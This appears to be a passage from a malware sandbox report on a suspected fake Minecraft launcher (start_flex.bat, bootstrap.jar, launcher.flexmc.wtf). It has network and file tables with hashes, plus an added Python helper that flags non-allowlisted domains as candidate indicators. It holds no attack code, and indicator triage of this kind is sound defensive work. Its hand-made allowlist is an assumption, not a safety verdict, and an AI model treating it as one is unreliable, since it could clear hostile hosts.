| US | 8.8.8.8:53 | 10.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 187.80.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.234.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.139.73.23.in-addr.arpa | udp |
| US | 104.26.7.160:443 | www.termsfeed.com | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | launcher.flexmc.wtf | udp |
| US | 104.21.46.74:443 | launcher.flexmc.wtf | tcp |
| US | 104.21.46.74:443 | launcher.flexmc.wtf | tcp |
| US | 104.21.46.74:443 | launcher.flexmc.wtf | udp |
| US | 8.8.8.8:53 | 74.46.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | launcher.flexmc.wtf | udp |
| US | 172.67.136.102:443 | launcher.flexmc.wtf | tcp |
| US | 8.8.8.8:53 | 102.136.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.178.250.142.in-addr.arpa | udp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| US | 192.178.49.163:443 | beacons.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | 163.49.178.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | beacons4.gvt2.com | udp |
| US | 216.239.32.116:443 | beacons4.gvt2.com | tcp |
| US | 216.239.32.116:443 | beacons4.gvt2.com | tcp |
| US | 216.239.32.116:443 | beacons4.gvt2.com | udp |
| US | 192.178.49.163:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | 116.32.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cxcs.microsoft.net | udp |
| BE | 104.68.66.114:443 | cxcs.microsoft.net | tcp |
| NL | 23.62.61.96:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 96.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 114.66.68.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.251.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 216.239.32.116:443 | beacons4.gvt2.com | udp |
| US | 172.67.136.102:443 | launcher.flexmc.wtf | tcp |
| US | 8.8.8.8:53 | 74.239.69.13.in-addr.arpa | udp |
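Added triage helper, not part of the sandbox output. Most rows in the Network table are DNS queries to 8.8.8.8, reverse lookups (in-addr.arpa) and first-party Chrome and Windows traffic. The script below parses rows in the table's own format, drops that noise, groups the remaining connections by domain and lists the domains that fall outside an analyst allowlist. The allowlist and the sample subset of rows are constructed for this example and are not part of the report.

```python
"""Added triage helper, not part of the sandbox output: reduce the Network
table above to the domains and endpoints worth acting on."""
import re
from typing import Dict, List

# Constructed sample: a subset of rows from the behavioral2 Network table,
# including a reverse-DNS row and the domain-less mDNS row, so each kind of
# noise is exercised.
SAMPLE_TABLE = """
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 216.58.213.4:443 | www.google.com | tcp |
| GB | 216.58.213.4:443 | www.google.com | udp |
| N/A | 224.0.0.251:5353 | N/A | udp |
| US | 8.8.8.8:53 | flexmc.com.tr | udp |
| US | 172.67.204.160:443 | flexmc.com.tr | tcp |
| US | 172.67.204.160:443 | flexmc.com.tr | udp |
| US | 8.8.8.8:53 | launcher.flexmc.wtf | udp |
| US | 104.21.46.74:443 | launcher.flexmc.wtf | tcp |
| US | 172.67.136.102:443 | launcher.flexmc.wtf | tcp |
| NL | 23.62.61.56:443 | www.bing.com | tcp |
| US | 104.21.80.187:443 | mcapi.us | tcp |
"""

# Analyst allowlist (an assumption of this helper, not part of the report):
# first-party Google, Microsoft and public-CDN hosts that a Chrome session
# contacts on its own. Anything outside it is a candidate IOC for review.
BENIGN_SUFFIXES = ('.google.com', '.gvt2.com', '.bing.com', '.bing.net',
                   '.microsoft.net', '.cloudflare.com', '.jsdelivr.net',
                   '.fontawesome.com')

# | Country | Destination | Domain | Proto |
ROW_RE = re.compile(r'^\|\s*([^|]*?)\s*\|\s*([^|]*?)\s*\|\s*([^|]*?)\s*\|\s*([^|]*?)\s*\|$')


def parse_rows(table: str) -> List[Dict[str, str]]:
    """Turn the pipe-delimited rows into dicts; header and separator rows are skipped."""
    rows = []
    for line in table.splitlines():
        m = ROW_RE.match(line.strip())
        if not m or m.group(1) == 'Country' or m.group(1).startswith('-'):
            continue
        cc, dst, domain, proto = m.groups()
        rows.append({'country': cc, 'dst': dst, 'domain': domain, 'proto': proto})
    return rows


def summarize(rows: List[Dict[str, str]]) -> Dict[str, Dict[str, object]]:
    """Per domain: whether it was looked up, and the endpoints actually contacted.
    Reverse lookups (in-addr.arpa), multicast DNS and rows with no domain are
    sandbox/Windows background noise and are dropped."""
    acc: Dict[str, Dict[str, object]] = {}
    for r in rows:
        domain = r['domain']
        if (domain == 'N/A' or domain.endswith('.in-addr.arpa')
                or r['dst'].startswith('224.0.0.251:')):
            continue
        entry = acc.setdefault(domain, {'queried': False, 'destinations': set(), 'protos': set()})
        if r['dst'].endswith(':53'):
            entry['queried'] = True          # a lookup, not a connection
        else:
            entry['destinations'].add(r['dst'])
            entry['protos'].add(r['proto'])
    return {d: {'queried': v['queried'],
                'destinations': sorted(v['destinations']),
                'protos': sorted(v['protos'])} for d, v in acc.items()}


def candidate_iocs(summary: Dict[str, Dict[str, object]]) -> List[str]:
    """Domains that were actually connected to and fall outside the allowlist."""
    return sorted(d for d, v in summary.items()
                  if v['destinations'] and not d.endswith(BENIGN_SUFFIXES))


if __name__ == '__main__':
    summary = summarize(parse_rows(SAMPLE_TABLE))
    for d in candidate_iocs(summary):
        print(d, '->', ', '.join(summary[d]['destinations']))
```

On the sample this yields flexmc.com.tr, launcher.flexmc.wtf and mcapi.us with their contacted endpoints, and shows that launcher.flexmc.wtf resolved to two different Cloudflare-range addresses during the run, which is why a domain rather than an IP is the durable indicator here. Pasting the full table into `SAMPLE_TABLE` produces the complete list for this report.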
Files
memory/4500-4-0x000002464DCB0000-0x000002464ECB0000-memory.dmp
C:\ProgramData\Oracle\Java\.oracle_jre_usage\3903daac9bc4a3b7.timestamp
| MD5 | 36c6890fd1b1c483fe51b2fa9a8c3f73 |
| SHA1 | ca1bbffc05a1f1d0374570c7a2cf6274b9bff1b2 |
| SHA256 | 0ce447f2c59ac62e70d397b11d9a9dd57f8ae58855ab017cac4a0dc79994b08d |
| SHA512 | cc36b02e35ec4b47e6b01fc3ed658323293716f089f070582c535bf001e8f68a4bbeb637a3bf0f0c28cc557e99cf6319ef4d2c0ae68779a2df1370d259885363 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
| MD5 | 5b232f2ec5e33f7709f554291a0582c7 |
| SHA1 | 8e09d16cdefd7434b6626535778c4d6aaa94502a |
| SHA256 | 539b48bb8997ee07f386d39e50b64b6a7f14ae24e0fd7c49a5d72e387860d5b5 |
| SHA512 | 570f3bde7f527c8af2cefc04c0bb7d9024c2836b328a25dd50546cffc192d8256a276c6e8e07c0ca5afe06af86b819569f25ac6213e006588fc7edcc95e24d81 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Variations
| MD5 | f732dbed9289177d15e236d0f8f2ddd3 |
| SHA1 | 53f822af51b014bc3d4b575865d9c3ef0e4debde |
| SHA256 | 2741df9ee9e9d9883397078f94480e9bc1d9c76996eec5cfe4e77929337cbe93 |
| SHA512 | b64e5021f32e26c752fcba15a139815894309b25644e74ceca46a9aa97070bca3b77ded569a9bfd694193d035ba75b61a8d6262c8e6d5c4d76b452b38f5150a4 |
memory/4500-25-0x000002464DC90000-0x000002464DC91000-memory.dmp
\??\pipe\crashpad_3692_GPGRGZAGXVJLATQW
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | cb5ffb9c78d8723f009480181bd3da32 |
| SHA1 | ba7e8d51ed355825e13cc3eaf34402560b048306 |
| SHA256 | af978754678e3a51db2a7067ddebb686f85c06561a7b918f42134463a6e71bcb |
| SHA512 | 072462858b94173f4c3a3bde7e80c1e6133abb9e485c35ef0f3a873966c48055ff08d85d3a1639acd1090a641fcacb81db35e70ab0e9b81c77ae16014907c29f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
memory/4500-57-0x000002464DC90000-0x000002464DC91000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 65674f82f6b0178cd55767363cdb7030 |
| SHA1 | 2299793b45e3cd208664187cb8b6382dc5ca6d20 |
| SHA256 | a77862d11c7727565afa92302d11b4f508a718152eff0a2742ca69058c616a6c |
| SHA512 | 55b81787f10b18c2cfb2dff3c616d6e4d884e7e4a93036b7c72fabf296385ac5519d8642023edb901e4811344546fca008422e2c7eaec619c39a6216508c96da |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | bd211ca5445b3d0bd6cd71134c6462ce |
| SHA1 | b41391f73cfa06a7e7347c81f47949a4b161af6a |
| SHA256 | 3499317b8c6269b3fed1643bfea4b66faa7c131a5ac7bc1237cbf30c059669aa |
| SHA512 | 21a7e4d484133b0fc0c966221518219264a4d783bad3f034b3f23527863a170f4315f424fd551b76d154a5b7265fd361c0dc65af5582baee32b9e723907e14f2 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | b5ae13b5e33556feeb7b7594d3b4b9a4 |
| SHA1 | 9597b13a5ebbd09a53e3684388cf3006254988f0 |
| SHA256 | 15b4e5eb3766c5f773ffe8501531cd23d278bde3507ec4ba88ab7b685c14697f |
| SHA512 | c31546e7f39fbb8b12a0ff0c149ee10db83555a380edf64cba5367addcb91c5720d14111e696e9201bc849c4bbdc1bd28e5afd85abc6f2d84638033ba0610920 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
| MD5 | a4b610574b2852f19d55bb0980241cb1 |
| SHA1 | 57fc52ce6a7d0f1790b18de90d16a697c6cc87ed |
| SHA256 | 8254d9ee89c7b48484e9792795cc91e0ef7c002e3818ff45c2deacc37f23768b |
| SHA512 | bd4b5660cd36e17e7c0c60f6630ddcfaf98742f31bb2f8928d84d7e386021fe37628fa8c70eba7f1014d4a96901ff1a5b029a386191c45a0f84d3bf770556e8f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 87542b0a19deb8be34c3c6196c62e18f |
| SHA1 | 725717590c6f197356680dc1e9b5549cebedf74b |
| SHA256 | 36be94c5acaa99989ea5d0f4576e93d9c8fa64407d19faba6995f8ae270336f7 |
| SHA512 | 5295f4a9307339368805d38d18322d5ad11020e89ddc3b6e8a7fc3277ff9a74e739d86ebeb22e5a852ca9baf674a6a0e377661c6bde7653e1bf44e583ca1de6c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
| MD5 | 16426a5d5076cfc5a11ced26e130f6cc |
| SHA1 | e703aab591f1989ea43499697aa7c713fde91bc8 |
| SHA256 | ecde7ad3b11ed0acc7cf104d6e1502932ae76decbebec0fd506af3bc44b750a6 |
| SHA512 | 4f146ad992003560bf5f18561827a40a91fb215c14c21bafb9d37d4d8dbba401e13dd32bbc5ffbd24c50bd9953bc6765246bd2754386b8fa00c9cfc3c79699e8 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe57c5b1.TMP
| MD5 | 0c785249fd3dc30bc8d5a705e7d30bf8 |
| SHA1 | 96b756af4cf204dc0859bc084a9715709c7d4356 |
| SHA256 | d76736ed20b22352543d5b43466729187ca977859f8bdcc2369349cc3cc48d33 |
| SHA512 | 1eddb599135bf2c2f1bf322c5fb61080d495674351a433560add99af6962e3b08d54431b5e578fbfa186a61d8551fb649e136a6672551bb150cc29ef86c9a05b |
memory/4500-220-0x000002464DCB0000-0x000002464ECB0000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 8afad84d7734f62e765f72383a49327c |
| SHA1 | 3f29a01419007eda14be42876624636a6589b8ac |
| SHA256 | ddc2f74e538814e3dba8b9037d2068901259b26fe218a6fcd2abc8166b5663e4 |
| SHA512 | 7ce3367b3d2db3d1b96ae63748c8668cb7e324d9b8d433097740eb6320bc1bfb02b144476635c2403fee8f21f33734fd0b50c71c07399df3258c3f8416460e55 |
C:\Users\Admin\Downloads\start_flex.bat
| MD5 | ae3f8392342ba5bf972003537bd86589 |
| SHA1 | d0a01513146966557737f8514786ea87c605b0a9 |
| SHA256 | 60c1fe154bfa443b9a71adcce5b684d6496b8111233837bae02e68efcb8459aa |
| SHA512 | 9902d3d778311b8b9e3e3837b5c4e00bbf18f2ff08623c28b76c746b4171a0fa0f9405a5a8555a720bf9ca771b099e214b8598e0be4f1807f3ed0f9ed0ccf345 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | ded1a0b48aee03019cabba1caa4a1449 |
| SHA1 | 4988218152aad927372685b1c216624c48c73ce6 |
| SHA256 | 7ad8fdaa28f3fcbdd95c8923cc35bc179be31ba3f3fe557c7be642e9d6d98e9a |
| SHA512 | 6a2035cca9e7d96a60168c963849df0068de5b66a7a376098c2fb9843e5126061522a86a89e8b141350770576fec889590547645240d605f5ff6882a68b18912 |
C:\Users\Admin\AppData\Roaming\.flex\bootstrap.jar
| MD5 | ef30f1ff249ccb123366b3c74d516e15 |
| SHA1 | bf81e46b7da82d142455fe400c5941dac30abe94 |
| SHA256 | 0f5193cda385538d75791b6b2d37dd5361b382e09314c66af44c111a71b50412 |
| SHA512 | 8215a40b7b3277f2241634130091631c3958f11aab307ff919c6fbea1d409c99b3725cb228c91a072eb069a0c25ad56eb65e848f46acda75f90308fc0bd040cd |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | e0067b1f3c69a9316e9176d5b3db6f2b |
| SHA1 | 7cc7389d401e897693ccfd0803fbca4010be85f7 |
| SHA256 | ff23b9248bed944b4278b1a3cc3b88bb6c069f2410d427832c0c4d7ef838f707 |
| SHA512 | b113d9119e885e5e07bac552cb26cdac7f4f3d23a1bc64914229907d6a9b57ae3267bed1eefc8a51043b320a6cf20f5e62049441130fb25f0f4c110baa00ca81 |
memory/3796-268-0x000001A308B70000-0x000001A309B70000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 0a14ac5c2132be64237ac9dd80f6b588 |
| SHA1 | ed7b207389b5afd25d5c5c05fcf8170560fe29c5 |
| SHA256 | c6feb82588f1b7ccb3d6eb8d101c4b01001ef2a1ea0d3e2cbbf23e72c1c7a1f5 |
| SHA512 | a72465ec9e4b21f307ad2be897da53bb9e8a3cfa63ff70d18043e1a7ce0aa451f62cf138f68194622f510da2d3917812208784190543e0b9b48c997c51b68aa2 |
memory/3796-282-0x000001A307270000-0x000001A307271000-memory.dmp
memory/3796-283-0x000001A307270000-0x000001A307271000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
| MD5 | c4b8ca6e3abd24c734b0aa246468b784 |
| SHA1 | 7ad5889dc0c6238e36f274036b69c3c6a0e9bc1d |
| SHA256 | dc2366f3c7c505629e85887ef899a93bc4086ed4165dac06e9ef5c02dc8b3668 |
| SHA512 | fc52a7738aba5a4fa96ddcd6e038975b3fe640ca4717709d28495874ef54e8c6f46c26bcb295dc86aade08b1bf90c117fc66e875974a428f1a164afc713d1615 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | c073e0a9102655e56ab2e0c65f575080 |
| SHA1 | f5d07b95f2073fde0debec7d6d24c22511f3998e |
| SHA256 | a81a26fe07f447aaa6ff672201d67faf34c2c9997bf37f310904216af3f68ffb |
| SHA512 | bc669669d2ae92211aede1253c35213a4e35d9a97bb55f3491aa8e5176b99fe1bbb40d95fe0375f81331a38e5e256d30afba58c92721206202013b97a4ca189f |
memory/3796-302-0x000001A307270000-0x000001A307271000-memory.dmp
memory/3796-305-0x000001A307270000-0x000001A307271000-memory.dmp
memory/3796-307-0x000001A307270000-0x000001A307271000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\c440991a-0a28-40b4-9773-adc9dfdee1a1.tmp
| MD5 | bbb0116b3080314735fde7b40a33efd9 |
| SHA1 | 956d6b5f5212e30d958304cd86c3f87b219d2c4a |
| SHA256 | a77c139d134056b43c22fb4ba7370843f4cbba8da34e0e613bde9c36f2fc3345 |
| SHA512 | 6cc14ba5ce475159cefa96e34a10a848e9dbf9718e4e1f9b9bdd82d6a4f1e6e6107fd9ac5b135c328cf8d337e1cd8a11477da4078462e4679796f195510e4c60 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 0dc805d982d3dfcb0704c34a6f57d280 |
| SHA1 | 13a9c27a4448216e3ba5729adb20c332f65797bc |
| SHA256 | a8e9221faf9a10531242930e68c1f7c6be43bd17010347fd329dcf8409d4f700 |
| SHA512 | 09b270244bb2ca535fb140cdcb737f77d78d10c6884aa04305a662b4229d38d343dcdc76731e0fcc6e8e931e254ea9e13a61f49f0d2706c5de72971fe7be6868 |
memory/3796-381-0x000001A307270000-0x000001A307271000-memory.dmp
memory/3796-416-0x000001A308B70000-0x000001A309B70000-memory.dmp
memory/3796-424-0x000001A308B70000-0x000001A309B70000-memory.dmp
memory/3796-429-0x000001A308B70000-0x000001A309B70000-memory.dmp
memory/3796-438-0x000001A308B70000-0x000001A309B70000-memory.dmp
memory/3796-440-0x000001A308B70000-0x000001A309B70000-memory.dmp
memory/3796-442-0x000001A308F20000-0x000001A308F30000-memory.dmp
memory/3796-441-0x000001A308F10000-0x000001A308F20000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 6f6d3c7fbe92e2fcbad0b38a57a4987a |
| SHA1 | ac7425e3627c285c4111b6e971775fe83401817a |
| SHA256 | 440845dfbc240a53c67bc8d116dd13a29a95043c00d694045f3f34852a3b48d1 |
| SHA512 | 06a08aaaa6901b4edd26ca5bca2902f5c1d25e79756768342272778a6e2e9880d741f538480bef50344b82962d230d4aba55c18dc448764d7f57a70d0e3547c5 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | e0ebd63b1e03faf5910d78c84268214b |
| SHA1 | f0100fa49a195ba1cac936690e17706c170fe891 |
| SHA256 | 736f75fd26adde5b93f159ad130803cf87cf461c8fc91a79522fcd671dbd5910 |
| SHA512 | 59c889fffba1988093ab5518f03b4aecfcb1bd0c5860a0aa78ef2528425c774497674d5374a08a2f50b316e091b1e68b637570291221a5d118e7a9f63f33f1d3 |
memory/4060-469-0x0000025B259E0000-0x0000025B259E1000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | c61a71904c67665a924b1500d5bcc11a |
| SHA1 | 94e62a2604f0647dd3a90ec0e8b85f2817d80e09 |
| SHA256 | 542d746b9a1151cda34d68536f9a74e8dcd7b6599a8efb143591325fba095c69 |
| SHA512 | 49a3b7693850e3d937ad9aaf9356de94d3da86bbe08065cecbd658ebba216389ef20bee2ea5eae00b5a3826dcec9eee4755e626048640c48d6e2558367680f32 |
C:\Users\Admin\AppData\Roaming\.flex\hs_err_pid3796.log
| MD5 | 24cb83ba0653e2fd67a6cad334726dc6 |
| SHA1 | 62b421ed0db43821d362cf95cd34bee8a792dfea |
| SHA256 | d9cada2596827736b6e76aa468a7e4d9bb719aa2841f64296089f945d056e908 |
| SHA512 | 51f7d3a3f441ce05b43c59b73d53ee4ae3855f5860f9393b9b86ba7fe0a4935cf4e436d2ecf22d52b22057d1751a54192797cf44dd8a4aec151f826010cfaed6 |
memory/3040-497-0x0000021300000000-0x0000021301000000-memory.dmp
C:\ProgramData\Oracle\Java\.oracle_jre_usage\3903daac9bc4a3b7.timestamp
| MD5 | 8370d99564c2443e7bbe68ffd496c655 |
| SHA1 | 1c7a3be57112f25d667cb4607a1879bc8199a34f |
| SHA256 | 0032ab7e6e0cb76d2a0ff6e7a905bdd2918ef6fef4328bf580b6192d982ae3f9 |
| SHA512 | d3507350dc4ded6acc2c409d7adf08658edb5d5de302d78350d60b7497913e1858dc0eb079ee3fdab4f511d9f11aedcd540539a28c04a17c8cb7fd8d84f6b1c2 |
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2177723727-746291240-1644359950-1000\83aa4cc77f591dfc2374580bbd95f6ba_83f067b2-4236-4e0d-83e4-ef79b7da67b0
| MD5 | c8366ae350e7019aefc9d1e6e6a498c6 |
| SHA1 | 5731d8a3e6568a5f2dfbbc87e3db9637df280b61 |
| SHA256 | 11e6aca8e682c046c83b721eeb5c72c5ef03cb5936c60df6f4993511ddc61238 |
| SHA512 | 33c980d5a638bfc791de291ebf4b6d263b384247ab27f261a54025108f2f85374b579a026e545f81395736dd40fa4696f2163ca17640dd47f1c42bc9971b18cd |
memory/3040-531-0x0000021300000000-0x0000021301000000-memory.dmp
memory/3040-535-0x0000021300000000-0x0000021301000000-memory.dmp
memory/3040-539-0x0000021300000000-0x0000021301000000-memory.dmp
memory/3040-555-0x0000021300000000-0x0000021301000000-memory.dmp
memory/3040-557-0x0000021300000000-0x0000021301000000-memory.dmp
memory/3040-560-0x0000021300000000-0x0000021301000000-memory.dmp
memory/3040-563-0x0000021300000000-0x0000021301000000-memory.dmp
memory/3040-566-0x0000021300000000-0x0000021301000000-memory.dmp
memory/3040-571-0x0000021300000000-0x0000021301000000-memory.dmp
memory/3040-575-0x0000021300000000-0x0000021301000000-memory.dmp